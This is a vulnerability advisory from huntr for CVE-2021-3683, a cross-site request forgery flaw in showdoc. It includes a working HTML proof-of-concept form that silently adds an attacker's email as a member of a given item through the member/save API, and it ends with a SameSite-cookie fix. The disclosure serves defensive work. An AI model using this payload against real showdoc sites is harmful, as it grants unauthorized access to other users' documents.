Headline
CVE-2021-3683: huntr: Cross-Site Request Forgery (CSRF) JavaScript Vulnerability in showdoc
showdoc is vulnerable to Cross-Site Request Forgery (CSRF)
✍️ Description
With this CSRF vulnerability, an attacker is able to add any member to any item if a user visits the attacker's site.
🕵️‍♂️ Proof of Concept
1. Open PoC.html in Firefox or Safari.
2. Now you can check that the member with email address evil@mail.com, who must already have been registered beforehand, has access to the item with id 1531601670203340.
// PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://www.showdoc.com.cn/server/index.php?s=/api/member/save" method="POST">
<input type="hidden" name="item_id" value="1531601670203340" />
<input type="hidden" name="username" value="evil@mail.com" />
<input type="hidden" name="cat_id" value="0" />
<input type="hidden" name="member_group_id" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
💥 Impact
This vulnerability is capable of revealing any item.
Fix
Set the SameSite attribute of cookies to Lax or Strict.